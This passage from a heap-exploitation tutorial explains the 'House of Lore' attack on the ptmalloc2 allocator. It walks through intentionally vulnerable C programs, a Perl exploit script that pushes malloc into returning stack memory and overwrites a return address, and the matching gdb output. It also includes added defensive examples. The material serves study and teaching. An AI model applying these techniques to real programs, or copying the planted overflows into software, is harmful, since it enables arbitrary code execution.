    printf("\nBuff3 -> [ %p ]\n", buff3);

    free(buff2);                     /* buff2 goes to the unsorted bin */

    /* larger request: buff2 is sorted into its smallbin */
    printf("\nBuff4 -> [ %p ]\n", malloc(1423));

    /* unbounded copy into the 16-byte buff1: the intended overflow */
    strcpy(buff1, argv[1]);

    func1();

    return 0;
}

---[ end thl.c ]---


The program is very simple: we have a buffer overflow in "buff1" and an
"evil_func( )" function which is never called but which we want to run.

In short we have everything we need in order to trigger THoL:

1) Make a first call to malloc(4056). It shouldn't be necessary, but we
   use it to warm up the system. Furthermore, in a real-life application
   the heap probably won't be starting from scratch.

2) We allocate three chunks of memory, 16, 128 and 256 bytes respectively.
   Since no chunks have been released before, we know that they must have
   been taken from the Wilderness or Top Chunk.

3) Free() the second chunk of 128 bytes. This is placed in the unsorted 
   bin.

4) Allocate a fourth chunk larger than the most recently freed chunk. The
   "buff2" is now extracted from the unsorted list and added to its 
   appropriate bin.

5) We have a vulnerable function strcpy( ) that can overwrite the header
   of the chunk previously passed to free( ) (including its "bk" field).

6) We call func1( ), which allocates two blocks of 128 bytes (the same size
   as the chunk previously released) to formulate a question and get a
   user response.

It seems that in point 6 there is nothing vulnerable, but everyone knows
that if "LB2" points to the stack, then we may overwrite a saved return
address. That is our goal, and we will see this approach.

A basic execution could be like this:

black@odisea:~/ptmalloc2$ ./thl AAAA

[PTMALLOC2] -> (Chunk from TOP)
Buff1 -> [ 0x804ffe8 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff2 -> [ 0x8050000 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff3 -> [ 0x8050088 ]

[PTMALLOC2] -> (Freed and unsorted chunk [ 0x804fff8 ])
[PTMALLOC2] -> (Chunk from TOP)
Buff4 -> [ 0x8050190 ]

[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0x804fff8 ])
[PTMALLOC2] -> (victim->bk = [ 0x804e188 ])
LB1 -> [ 0x8050000 ]
[PTMALLOC2] -> (Chunk from TOP)
LB2 -> [ 0x8050728 ]
Which is your favourite hobby: hack
black@odisea:~/ptmalloc2$


We can see that the first 3 malloced chunks are taken from the TOP, then
the second chunk (0x0804fff8) is passed to free() and placed in the
unsorted bin. This piece will remain there until the next call to
malloc( ) determines whether it can meet the demand or not.

Since the fourth allocated buffer is larger than the recently freed one,
it's taken again from TOP, and buff2 is extracted from the unsorted bin and
inserted into the bin corresponding to its size (128).

Next we see how the following call to malloc(128) (lb1) triggers the
smallbin code, returning the same address as the buffer previously freed.
You can see the value of "victim->bk", which is what (lb2) should take
after this address has been passed to the chunk2mem( ) macro.

However, we can see in the output that lb2 is taken from the TOP and not
from a smallbin. Why? Simple, we've just released one chunk (the bin
corresponding to its size held only that piece) and since we have not
altered the "bk" pointer of the piece released, the next check:


   if ( (victim = last(bin)) != bin)

which is the same as:

   if ( (victim = (bin->bk = oldvictim->bk)) != bin)

will say that the last piece in the bin points to the bin itself, and
therefore, the allocation must be extracted from another place.

So far so good. What, then, do we need to exploit the program?

1) Overwrite buff2->bk with an address on the stack near a saved return
   address (inside the frame created by func1( )).

2) This address, in turn, must fall on a site such that the "bk" pointer of
   this fake chunk will be an address with write permissions.

3) The evil_func()'s address with which we want to overwrite EIP and the
   necessary padding to reach the return address.

Let's start with the basics:

If we set a breakpoint in func1( ) and examine memory, we get:


(gdb) x/16x $ebp-32
0xbffff338:     0x00000000      0x00000000      0xbffff388      0x00743fc0
0xbffff348:     0x00251340      0x00182a20      0x00000000      0x00000000
0xbffff358:     0xbffff388      0x08048d1e      0x0804ffe8      0xbffff5d7
0xbffff368:     0x0804c0b0      0xbffff388      0x0013f345      0x08050088

EBP -> 0xbffff358
RET -> 0xbffff35C


But the important thing here is that we must alter buff2->bk with the
"0xbffff33c" value so the new victim->bk takes a writable address.

Items 1 and 2 passed. The evil_func()'s address is:


(gdb) disass evil_func
Dump of assembler code for function evil_func:
0x08048ba4 <evil_func+0>:       push   %ebp  


And now, without further delay, let's see what happens when we merge all
these elements into a single attack:


black@odisea:~/ptmalloc2$ perl -e 'print "BBBBBBBB". "\xa4\x8b\x04\x08"' >
evil.in

...

(gdb) run `perl -e 'print "A"x28 . "\x3c\xf3\xff\xbf"'` < evil.in                                                                            

[PTMALLOC2] -> (Chunk from TOP)
Buff1 -> [ 0x804ffe8 ] 
[PTMALLOC2] -> (Chunk from TOP)
Buff2 -> [ 0x8050000 ] 
[PTMALLOC2] -> (Chunk from TOP)
Buff3 -> [ 0x8050088 ]         

[PTMALLOC2] -> (Freed and unsorted chunk [ 0x804fff8 ])
[PTMALLOC2] -> (Chunk from TOP)                                                
Buff4 -> [ 0x8050190 ]

[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0x804fff8 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff33c ]) // First stage of attack
LB1 -> [ 0x8050000 ]
[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0xbffff33c ])     // Victim in the stack
[PTMALLOC2] -> (victim->bk = [ 0xbffff378 ]) // Address with write perms

LB2 -> [ 0xbffff344 ]                        // Boom!
Which is your favourite hobby?

This is an evil function. You become a cool hacker if you are able to
execute it.                                  // We get a cool msg.

Program received signal SIGSEGV, Segmentation fault.
0x08048bb7 in evil_func ()
(gdb)


You must be starting to understand now what I wanted to explain in the
preface of this article: instead of discovering or inventing a new
technique, what we have been doing for a long time is finding a way to
design an application vulnerable to this technique, which fell to us from
the sky a few years ago.

Compile this example with normal GLIBC and you will get the same result.
Just remember to adjust the evil_func( ) address or the area where you have
stored your custom arbitrary code.



               << The unexamined life is not worth living. >>

                                                 [ Socrates ]



               .----------------------------.
---[ 2.2.2 ---[   A More Confusing Example   ]---
               .----------------------------.

To understand how THoL could be applied in a real-life application, I
present below some source code I wrote as if it were a game, which will
offer a broader view of the attack.

This is a crude imitation of an agent manager. The only thing this program
can do is create a new agent, edit it (i.e. edit its name and
description) or delete it. To save space, one can edit only certain
fields of an agent, leaving the others free without taking up memory, or
freeing them when no longer needed.

In addition, to avoid unnecessary extensions in this paper, the entire
information entered into the program is not saved in any database and only
remains available while the application is in execution.


---[ agents.c ]---

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void main_menu(void);

void create_agent(void);
void select_agent(void);
void edit_agent(void);
void delete_agent(void);

void edit_name(void);
void edit_lastname(void);
void edit_desc(void);
void delete_name(void);
void delete_lastname(void);
void delete_desc(void);
void show_data_agent(void);

typedef struct agent {
   int id;
   char *name;
   char *lastname;
   char *desc;
} agent_t;

agent_t *agents[256];
int agent_count = 0;
int sel_ag = 0;

int main(int argc, char *argv[])
{
      main_menu();
}

void main_menu(void)
{
   int op = 0;
   char opt[2];

   printf("\n\t\t\t\t[1] Create new agent");
   printf("\n\t\t\t\t[2] Select Agent");
   printf("\n\t\t\t\t[3] Show Data Agent");
   printf("\n\t\t\t\t[4] Edit agent");
   printf("\n\t\t\t\t[0] <- EXIT");
   printf("\n\t\t\t\tSelect your option:");
   fgets(opt, 3, stdin);

   op = atoi(opt);
   
   switch (op) {
	case 1:
		create_agent();
		break;
	case 2:
		select_agent();
		break;
	case 3:
		show_data_agent();
		break;
	case 4:
		edit_agent();
		break;
	case 0:
           	 exit(0);
    	default:
	  	break;
   }     

   main_menu();
}

void create_agent(void)
{
   agents[agent_count] = (agent_t *) malloc(sizeof(agent_t));
   sel_ag = agent_count;
   agents[agent_count]->id = agent_count;
   agents[agent_count]->name = NULL;
   agents[agent_count]->lastname = NULL;
   agents[agent_count]->desc = NULL;
   printf("\nAgent %d created, now you can edit it", sel_ag);
   agent_count += 1;
}

void select_agent(void)
{
   char ag_num[2];
   int num;
  
   printf("\nWrite agent number: ");
   fgets(ag_num, 3, stdin);
   num = atoi(ag_num);

   if ( num >= agent_count ) {
       printf("\nOnly %d available agents, select another", agent_count);
   } else {
       sel_ag = num;
       printf("\n[+] Agent %d selected.", sel_ag);
   }
}

void show_data_agent(void)
{
   printf("\nAgent [%d]", agents[sel_ag]->id);

   printf("\nName: "); 
   if(agents[sel_ag]->name != NULL)
       printf("%s", agents[sel_ag]->name);

   printf("\nLastname: ");  
   if(agents[sel_ag]->lastname != NULL)
       printf("%s", agents[sel_ag]->lastname);
   
   printf("\nDescription: ");
   if(agents[sel_ag]->desc != NULL)
       printf("%s", agents[sel_ag]->desc);
}

void edit_agent(void)
{
   int op = 0;
   char opt[2];

   printf("\n\t\t\t\t[1] Edit name");
   printf("\n\t\t\t\t[2] Edit lastname");
   printf("\n\t\t\t\t[3] Edit description");
   printf("\n\t\t\t\t[4] Delete name");
   printf("\n\t\t\t\t[5] Delete lastname");
   printf("\n\t\t\t\t[6] Delete description");
   printf("\n\t\t\t\t[7] Delete agent");
   printf("\n\t\t\t\t[0] <- MAIN MENU");
   printf("\n\t\t\t\tSelect Agent Option: ");
   fgets(opt, 3, stdin);

   op = atoi(opt);

   switch (op) {
      case 1:
           edit_name();
	   break;
      case 2:
           edit_lastname();
           break;
      case 3:
           edit_desc();
           break;
      case 4:
           delete_name();
   	   break;
      case 5:
           delete_lastname();
           break;
      case 6:
           delete_desc();
           break;
      case 7:
           delete_agent();
           break;
      case 0:
           main_menu();
      default:
         break;
   }
  
   edit_agent();
}

void edit_name(void)
{
   if(agents[sel_ag]->name == NULL) {
      agents[sel_ag]->name = (char *) malloc(32);
      printf("\n[!!!]malloc(ed) name [ %p ]", agents[sel_ag]->name);
   }

   printf("\nWrite name for this agent: ");
   fgets(agents[sel_ag]->name, 322, stdin);
}

void delete_name(void)
{
   if(agents[sel_ag]->name != NULL) {
      free(agents[sel_ag]->name);
      agents[sel_ag]->name = NULL;
   }
}

void edit_lastname(void)
{
   if(agents[sel_ag]->lastname == NULL) {
      agents[sel_ag]->lastname = (char *) malloc(128);
      printf("\n[!!!]malloc(ed) lastname [ %p ]",agents[sel_ag]->lastname);
   }
   
   printf("\nWrite lastname for this agent: ");
   fgets(agents[sel_ag]->lastname, 127, stdin);
}

void delete_lastname(void)
{
   if(agents[sel_ag]->lastname != NULL) {
      free(agents[sel_ag]->lastname);
      agents[sel_ag]->lastname = NULL;
   }
}

void edit_desc(void)
{
   if(agents[sel_ag]->desc == NULL) {
      agents[sel_ag]->desc = (char *) malloc(256);
      printf("\n[!!!]malloc(ed) desc [ %p ]", agents[sel_ag]->desc);
   }

   printf("\nWrite description for this agent: ");
   fgets(agents[sel_ag]->desc, 255, stdin);
}

void delete_desc(void)
{
   if(agents[sel_ag]->desc != NULL) {
      free(agents[sel_ag]->desc);
      agents[sel_ag]->desc = NULL;
   }
}

void delete_agent(void)
{
    if (agents[sel_ag] != NULL) {
        free(agents[sel_ag]);
        agents[sel_ag] = NULL;
    
        printf("\n[+] Agent %d deleted\n", sel_ag);

        if (sel_ag == 0) {
            agent_count = 0;
	      printf("\n[!] Empty list, please create new agents\n");
        } else {
	      sel_ag -= 1;
            agent_count -= 1;
	      printf("[+] Current agent selection: %d\n", sel_ag);
        }
    } else {
        printf("\n[!] No agents to delete\n"); 
    }
}

---[ end agents.c ]---


This is the perfect program that I would present in a wargame to those who 
wish to apply the technique described in this paper.


Someone might think that maybe this program is vulnerable to other
techniques described in the Malloc Des-Maleficarum. Indeed, given the
ability of the user to manage the memory space, it may seem that The House
of Mind can be applied here, but one must see that the program limits us to
the creation of 256 structures of type "agent_t", and that the size of
these structures is about 432 bytes (approximately, when you allocate all
its fields). If we multiply this number by 256 we get: (110592 = 0x1B000h)
which seems too small to let us reach the desirable address "0x08100000"
necessary to corrupt the NON_MAIN_ARENA bit of an already allocated chunk
above that address (and thus create a fake arena in order to trigger the
aforementioned attack).

Another technique that one would take as viable would be The House of Force
since at first it is easy to corrupt the Wilderness (the Top Chunk), but
remember that in order to apply this method one of the requirements is that
the size of a call to malloc( ) must be defined by the designer with the
main goal of corrupting "av->top". This seems impossible here.

Other techniques are also unworkable for several reasons, each due to their
intrinsic requirements. So we must study how to sort the steps that trigger
the vulnerability and the attack process that we have studied so far.

Let's see in detail:

After a quick look, we found that the only vulnerable function is:


   void edit_name(void) {
      ...
         agents[sel_ag]->name = (char *) malloc(32);
      ...
      fgets(agents[sel_ag]->name, 322, stdin);


At first it seems a simple typographical error, but it allows us to
overwrite the memory chunk allocated after "agents[]->name", which can be
any, since the program allows practically full control over memory.
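
One way to keep the allocation size and the read limit from drifting apart,
as they do in edit_name( ) (32 against 322). This is an added example, not
part of agents.c or of the original paper; field_t, field_read( ), demo( )
and the input are hypothetical names and constructed data.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* A heap string that carries its own capacity, so the size passed to
 * malloc( ) and the limit passed to fgets( ) are always the same number. */
typedef struct {
    char  *buf;
    size_t cap;
} field_t;

/* Read one line into f, allocating cap bytes on first use (later calls reuse
 * the stored capacity). Input beyond cap - 1 bytes is discarded up to the
 * newline. Returns the number of bytes stored, or -1 on failure or EOF. */
int field_read(field_t *f, size_t cap, FILE *in)
{
    if (f->buf == NULL) {
        if (cap < 2 || (f->buf = malloc(cap)) == NULL)
            return -1;
        f->cap = cap;
    }
    if (fgets(f->buf, (int)f->cap, in) == NULL)
        return -1;

    size_t n = strcspn(f->buf, "\n");
    if (f->buf[n] == '\n') {
        f->buf[n] = '\0';                 /* whole line fitted */
    } else {
        int c;                            /* line was longer: drain the rest */
        while ((c = getc(in)) != EOF && c != '\n')
            ;
    }
    return (int)n;
}

static char g_last[128];                  /* lastname seen by the last demo() */

/* Constructed input: a 300-byte name line followed by a normal lastname.
 * Returns how many bytes of the name were stored in the 32-byte field. */
int demo(void)
{
    field_t name = {0}, lastname = {0};
    FILE *in = tmpfile();
    if (in == NULL)
        return -1;
    for (int i = 0; i < 300; i++)
        fputc('A', in);
    fputs("\nngel\n", in);
    rewind(in);

    int n = field_read(&name, 32, in);
    g_last[0] = '\0';
    if (field_read(&lastname, 128, in) >= 0)
        snprintf(g_last, sizeof g_last, "%s", lastname.buf);

    fclose(in);
    free(name.buf);
    free(lastname.buf);
    return n;
}

const char *demo_last(void) { return g_last; }

int main(void)
{
    int n = demo();
    printf("name bytes stored: %d, lastname read next: %s\n", n, demo_last());
    return 0;
}
```

The overlong line is truncated to the field's capacity and the excess is
consumed, so it neither reaches the neighbouring chunk nor leaks into the
next prompt.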

To imitate as closely as possible the vulnerable process shown in the
previous section, the most obvious thing we can do to start is to create a
new agent (0) and edit all fields. With this we get:


   malloc(sizeof(agent_t));  // new agent
   malloc(32);               // agents[0]->name
   malloc(128);              // agents[0]->lastname
   malloc(256);              // agents[0]->desc


The main target is to overwrite the "bk" pointer in the field 
"agents[]->lastname" if we have freed this chunk previously. Moreover, 
between these two actions, we need to allocate a chunk of memory to be
selected from the "TOP code", so that the chunks present in the unsorted 
bin are sorted in their corresponding bins for a later reuse.

For this, what we do is create a new agent(1), select the first agent(0) 
and delete its field "lastname", select the second agent(1) and edit its
description. This is equal to:


   malloc(sizeof(agent_t));      // Get a chunk from TOP code      
   free(agents[0]->lastname);    // Insert chunk at unsorted bin
   malloc(256);                  // Get a chunk from TOP code


After this last call to malloc( ), the freed chunk of 128 bytes (lastname)
will have been placed in its corresponding bin. Now we can alter "bk" 
pointer of this chunk, and for this we select again the first agent(0) and 
edit its name (here there will be no call to malloc( ) since it has been 
previously assigned).

At this time, we can place a proper memory address pointing to the stack 
and make two calls to malloc(128), first editing the "lastname" field of 
the second agent(1) and then editing the "lastname" field of agent(0) one
more time.

These latest actions should return a memory pointer located in the stack in
a position of your choice, and any written content on "agents[0]->lastname"
could corrupt a saved return address.

Without wishing to dwell on it much longer, we show here how a tiny exploit
alters the above "bk" pointer and returns a chunk of memory located in the
stack:


---[ exthl.pl ]---

#!/usr/bin/perl

print "1\n" .              # Create agents[0]
      "4\n" .              # Edit agents[0]
      "1\nblack\n" .       # Edit name agents[0]
      "2\nngel\n" .        # Edit lastname agents[0]
      "3\nsuperagent\n" .  # Edit description agents[0]
      "0\n1\n" .           # Create agents[1]
      "2\n0\n" .           # Select agents[0]
      "4\n5\n" .           # Delete lastname agents[0]
      "0\n2\n1\n" .        # Select agents[1]
      "4\n" .              # Edit agents[1]
      "3\nsupersuper\n" .  # Edit description agents[1]
      "0\n2\n0\n" .        # Select agents[0]
      "4\n" .              # Edit agents[0]
      "1\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
      "\x94\xee\xff\xbf" . # Edit name[0] and overwrite "lastname->bk"
      "\n0\n2\n1\n" .      # Select agents[1]
      "4\n" .              # Edit agents[1]
      "2\nother\n" .       # Edit lastname agents[1]
      "0\n2\n0\n" .        # Select agents[0]
      "4\n" .              # Edit agents[0]
      "2\nBBBBBBBBBBBBBBBBBBBBB" .
      "BBBBBBBBBBBBBBBBBBBBBBBBBBBB\n"; # Edit lastname agents[0]
                                        # and overwrite a {RET}

---[ end exthl.pl ]---


And here is the result, displaying only the outputs of interest for us:


black@odisea:~/ptmalloc2$ ./exthl | ./agents
.....      

[PTMALLOC2] -> (Smallbin code reached)              
[PTMALLOC2] -> (victim = [ 0x8 ])             // Create new agents[0]    
Agent 0 created, now you can edit it                

.....

[PTMALLOC2] -> (Chunk from TOP)                       
[!!!]malloc(ed) name [ 0x804f020 ]            // Edit name agents[0]          
Write name for this agent:                            

.....

[PTMALLOC2] -> (Chunk from TOP)                       
[!!!]malloc(ed) lastname [ 0x804f048 ]        // Edit lastname agents[0]
Write lastname for this agent:                        

.....
  
[PTMALLOC2] -> (Chunk from TOP)                       
[!!!]malloc(ed) desc [ 0x804f0d0 ]           // Edit description agents[0]                  
Write description for this agent:                     

.....
  
[PTMALLOC2] -> (Chunk from TOP)                       
Agent 1 created, now you can edit it         // Create new agents[1]
         
.....
  
Write agent number:                                   
[+] Agent 0 selected.                        // Select agents[0]         

.....
 
[PTMALLOC2] -> (Freed and unsorted [ 0x804f040 ] chunk) // Delete lastname

.....
  
Write agent number:                                    
[+] Agent 1 selected.                        // Select agents[1]           

.....
  
[PTMALLOC2] -> (Chunk from TOP)                        
[!!!]malloc(ed) desc [ 0x804f1f0 ]           // Edit description agents[1]             
Write description for this agent:                      

.....

Write agent number:                                    
[+] Agent 0 selected.                        // Select agents[0] 

.....
  
Write name for this agent:                   // Edit name agents[0]                     
   
Write agent number:                                    
[+] Agent 1 selected.                        // Select agents[1]

.....

[PTMALLOC2] -> (Smallbin code reached)                 
[PTMALLOC2] -> (victim = [ 0x804f048 ])                
[PTMALLOC2] -> (victim->bk = [ 0xbfffee94 ])           

[!!!]malloc(ed) lastname [ 0x804f048 ]
Write lastname for this agent:               // Edit lastname agents[1]

.....
 
Write agent number:                                   
[+] Agent 0 selected.                        // Select agents[0]          

.....

[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0xbfffee94 ])
[PTMALLOC2] -> (victim->bk = [ 0xbfffeec0 ])

[!!!]malloc(ed) lastname [ 0xbfffee9c ]     // Edit lastname agents[0]
Segmentation fault
black@odisea:~/ptmalloc2$


Everyone can predict what happened in the end, but GDB can clarify for us a
few things:


----- snip -----

[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0xbfffee94 ])
[PTMALLOC2] -> (victim->bk = [ 0xbfffeec0 ])

[!!!]malloc(ed) lastname [ 0xbfffee9c ]

Program received signal SIGSEGV, Segmentation fault.
0x080490f6 in edit_lastname ()
(gdb) x/i $eip
0x80490f6 <edit_lastname+150>:  ret
(gdb) x/8x $esp
0xbfffee9c:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffeeac:     0x42424242      0x42424242      0x42424242      0x42424242
(gdb)

----- snip -----


And you have moved to the next level of your favorite wargame, or at least
you have increased your level of knowledge and skills. 

Now, I encourage you to compile this program with your regular glibc (not
static Ptmalloc2), and verify that the result is exactly the same; the
internal code does not change.

I don't know if anyone has noticed, but another of the techniques that in
principle could be applied to this case is the forgotten The House of
Prime. The requirement for implementing it is the manipulation of the
header of two chunks that will be freed. This is possible since an overflow
in agents[]->name can overwrite both agents[]->lastname and agents[]->desc,
and we can decide both when to free them and in what order. However, The
House of Prime also needs at least the possibility of placing an integer
on the stack to overcome a last check and this is where it seems that we
stay trapped. Also, remember that since glibc 2.3.6 one can no longer pass
to free( ) a chunk smaller than 16 bytes whereas this is the first
requirement inherent to this technique (alter the size field of the first
piece overwritten 0x9h = 0x8h + PREV_INUSE bit).



               << It is common sense to take a method and
                  try it; if it fails, admit it frankly and
                  try another. But above all, try something. >>

                                      [ Franklin D. Roosevelt ]



           .------------------------------.
---[ 3 ---[   LargeBin Corruption Method   ]---
           .------------------------------.

In order to apply the method recently explained to a largebin we need the 
same conditions, except that the size of the chunks allocated should be 
above 512 bytes as seen above.

However, in this case the code triggered in "_int_malloc( )" is different 
and more complex. Extra requirements will be necessary in order to achieve 
a successful execution of arbitrary code.

We will make some minor modifications to the vulnerable program presented
in 2.2.1 and will see, through the practice, which of these preconditions
must be met.

Here is the code:


---[ thl-large.c ]---

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void evil_func(void)
{
    printf("\nThis is an evil function. You become a cool \
              hacker if you are able to execute it\n"); 
}

void func1(void)
{
    char *lb1, *lb2;
     
    lb1 = (char *) malloc(1536);
    printf("\nLB1 -> [ %p ]", lb1);
    lb2 = malloc(1536);
    printf("\nLB2 -> [ %p ]", lb2);

    strcpy(lb1, "Which is your favourite hobby: ");
    printf("\n%s", lb1);
    fgets(lb2, 128, stdin);
}

int main(int argc, char *argv[])
{
    char *buff1, *buff2, *buff3;

    malloc(4096);
    buff1 = (char *) malloc(1024);
    printf("\nBuff1 -> [ %p ]", buff1);
    buff2 = (char *) malloc(2048);
    printf("\nBuff2 -> [ %p ]", buff2);
    buff3 = (char *) malloc(4096);
    printf("\nBuff3 -> [ %p ]\n", buff3);

    free(buff2);

    printf("\nBuff4 -> [ %p ]", malloc(4096));

    strcpy(buff1, argv[1]);

    func1();

    return 0;
}

---[ end thl-large.c ]---


As you can see, we still need an extra reserve (buff4) after releasing the 
second allocated chunk. This is because it's not a good idea to have a 
corrupted "bk" pointer in a chunk that still is in the unsorted bin. When 
it happens, the program usually breaks sooner or later in the instructions:


      /* remove from unsorted list */
      unsorted_chunks(av)->bk = bck;
      bck->fd = unsorted_chunks(av);


But if we do not do anything wrong before the recently freed chunk is
placed in its corresponding bin, then we pass without penalty or glory
through the next area of code:


    while ( (victim = unsorted_chunks(av)->bk) != unsorted_chunks(av)) {
       ...
    }


Having passed this code means that (buff2) has been introduced in its 
corresponding largebin. Therefore we will reach this code:


----- snip -----

    if (!in_smallbin_range(nb)) {
      bin = bin_at(av, idx);

      for (victim = last(bin); victim != bin; victim = victim->bk) {
	size = chunksize(victim);

	if ((unsigned long)(size) >= (unsigned long)(nb)) {
	  printf("\n[PTMALLOC2] No enter here please\n");
	  remainder_size = size - nb;
	  unlink(victim, bck, fwd);
	  .....

----- snip -----


This does not look good. The unlink( ) macro is called, and we know the 
associated protection since the 2.3.6 version of Glibc. Going there would 
destroy all the work done until now.

Here comes one of the first differences in the largebin corruption method. 
In 2.2.1 we said that after overwriting the "bk" pointer of the free( ) 
chunk, two calls to malloc( ) with the same size should be carried out to 
return a pointer *mem in an arbitrary memory address.

In largebin corruption, we must avoid this code at all cost. For this, the
two calls to malloc( ) must request less than buff2->size. Phantasmal told
us "512 < M < N", and that is what we see in our vulnerable application:
512 < 1536 < 2048.

As no chunk of this size (1536), or at least belonging to the same bin, has
previously been freed, "_int_malloc( )" tries to find a chunk that can
fulfill the request starting from the bin after the one just scanned:


    // Search for a chunk by scanning bins, starting with next largest bin.

    ++idx;
    bin = bin_at(av,idx); 


And here is where the magic comes, the following piece of code will be 
executed:


----- snip -----

      victim = last(bin);
      .....
      else {
        size = chunksize(victim);

        remainder_size = size - nb;

printf("\n[PTMALLOC2] -> (Largebin code reached)");
printf("\n[PTMALLOC2] -> remander_size = size (%d) - nb (%d) = %u", size,
                                                       nb, remainder_size);
printf("\n[PTMALLOC2] -> (victim = [ %p ])", victim);
printf("\n[PTMALLOC2] -> (victim->bk = [ %p ])\n", victim->bk);

        /* unlink */
        bck = victim->bk;
        bin->bk = bck;
        bck->fd = bin;

        /* Exhaust */
        if (remainder_size < MINSIZE) {
	  printf("\n[PTMALLOC2] -> Exhaust code!! You win!\n");
          .....
          return chunk2mem(victim);
        }

        /* Split */
        else {
          .....
          set_foot(remainder, remainder_size);
          check_malloced_chunk(av, victim, nb);
          return chunk2mem(victim);
        }
      }

----- snip -----


The code has been properly trimmed to show only the parts that have
relevance in the method we are describing. The calls to printf( ) are my
own and you will soon see their usefulness.

Also it's easy to see that the process is practically the same as in the
smallbin code. You take the last chunk of the respective largebin 
(last(bin)) in "victim" and proceed to unlink it (without macro) before 
reaching the user control. Since we control "victim->bk", at first the
attack requirements are the same, but then, where is the difference?

Calling set_foot( ) tends to produce a segmentation fault since
"remainder_size" is calculated from "victim->size", a value that until now
we were filling with random data. The result is something like the
following:


(gdb) run `perl -e 'print "A" x 1036 . "\x44\xf0\xff\xbf"'`                                                                                  

[PTMALLOC2] -> (Chunk from TOP)
Buff1 -> [ 0x8050010 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff2 -> [ 0x8050418 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff3 -> [ 0x8050c20 ]

[PTMALLOC2] -> (Freed and unsorted [ 0x8050410 ] chunk)
[PTMALLOC2] -> (Chunk from TOP)
Buff4 -> [ 0x8051c28 ]
[PTMALLOC2] -> (Largebin code reached)
[PTMALLOC2] -> remander_size = size (1094795584) - nb (1544) = 1094794040
[PTMALLOC2] -> (victim = [ 0x8050410 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff044 ])

Program received signal SIGSEGV, Segmentation fault.
0x0804a072 in _int_malloc (av=0x804e0c0, bytes=1536) at malloc.c:4144
4144              set_foot(remainder, remainder_size);
(gdb)


The solution is then to force the conditional:

   if (remainder_size < MINSIZE) {
      ...
   }

Anyone might think of overwriting "victim->size" with a value like 
"0xfcfcfcfc" which would generate as a result a negative number smaller 
than MINSIZE, but we must remember that "remainder_size" is defined as an 
"unsigned long" and therefore the result will always be a positive value.

The only possibility that remains then is that the vulnerable application
allows us to insert null bytes in the attack string, and therefore to
supply a value such as (0x00000610 = 1552) that would generate:
1552 - 1544 (align) = 8 and the condition would be fulfilled. Let us see it
in action:


(gdb) set *(0x08050410+4)=0x00000610        
(gdb) c                                     
Continuing.                                
Buff4 -> [ 0x8051c28 ]
[PTMALLOC2] -> (Largebin code reached)
[PTMALLOC2] -> remander_size = size (1552) - nb (1544) = 8
[PTMALLOC2] -> (victim = [ 0x8050410 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff044 ])

[PTMALLOC2] -> Exhaust code!! You win!

LB1 -> [ 0x8050418 ]
[PTMALLOC2] -> (Largebin code reached)
[PTMALLOC2] -> remander_size = size (-1073744384) - nb (1544) = 3221221368
[PTMALLOC2] -> (victim = [ 0xbffff044 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff651 ])

Program received signal SIGSEGV, Segmentation fault.
0x0804a072 in _int_malloc (av=0x804e0c0, bytes=1536) at malloc.c:4144
4144              set_foot(remainder, remainder_size);


Perfect, we reached the second memory request where we saw that victim is
equal to 0xbffff044 which, being returned, would provide a chunk whose *mem
points to the stack. However set_foot( ) again gives us problems, and this
is obviously because we are not controlling the "size" field of this fake
chunk created on the stack.

This is where we have to overcome the latter condition. Victim should point
to a memory location containing user-controlled data, so that we can enter 
an appropriate "size" value and conclude the technique.

We end this section by saying that the largebin corruption method is not 
just pure fantasy as we've made it a reality. However it is true that 
finding the required preconditions of attack in real-life applications is
almost impossible.

As a curious note, one might try to overwrite "victim->size" with 
0xffffffff (-1) and check that on this occasion set_foot( ) seems to follow
its course without breaking the program.

Note: Again we have not tested all versions of glibc, but we noted the
following fixes in advanced versions:


----- snip -----

      else {
        size = chunksize(victim);

        /*  We know the first chunk in this bin is big enough to use. */
        assert((unsigned long)(size) >= (unsigned long)(nb));  <-- !!!!!!!

        remainder_size = size - nb;

        /* unlink */
        unlink(victim, bck, fwd);

        /* Exhaust */
        if (remainder_size < MINSIZE) {
          set_inuse_bit_at_offset(victim, size);
          if (av != &main_arena)
            victim->size |= NON_MAIN_ARENA;
        }

        /* Split */
        else {

----- snip -----


What this means is that the unlink( ) macro has been newly introduced into
the code, and thus the classic pointer testing mitigates the attack.
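
The difference between the hand-written unlink of the trimmed listing and
the checked version in the fix can be modelled outside the allocator. This
is an added example, not ptmalloc2 or glibc code: the chunk struct is a
simplified 32-bit-style model, take_last( ), scenario( ) and the fixtures
are hypothetical, and the sizes are the ones printed in the runs above.

```c
#include <stdint.h>
#include <stdio.h>

#define MINSIZE   16u   /* minimum chunk size on the 32-bit target used above */
#define FLAG_BITS 0x7u  /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

/* Simplified model of a chunk header; field names follow ptmalloc2. */
struct chunk {
    uint32_t prev_size;
    uint32_t size;
    struct chunk *fd, *bk;
};

enum result { R_EXHAUST, R_SPLIT, R_ABORT_SIZE, R_ABORT_LINKS };

/* chunksize(victim) - nb in 32-bit unsigned arithmetic: it wraps around and
 * is never negative, so a huge size field cannot satisfy "< MINSIZE". */
uint32_t remainder_size(uint32_t head, uint32_t nb)
{
    return (head & ~FLAG_BITS) - nb;
}

/* Serve a request of nb bytes from the last chunk of a bin.
 * hardened == 0: hand-written unlink, as in the trimmed listing.
 * hardened == 1: size assertion plus the pointer test of unlink( ). */
enum result take_last(struct chunk *bin, uint32_t nb, int hardened)
{
    struct chunk *victim = bin->bk;
    struct chunk *fwd = victim->fd, *bck = victim->bk;

    if (hardened) {
        if ((victim->size & ~FLAG_BITS) < nb)
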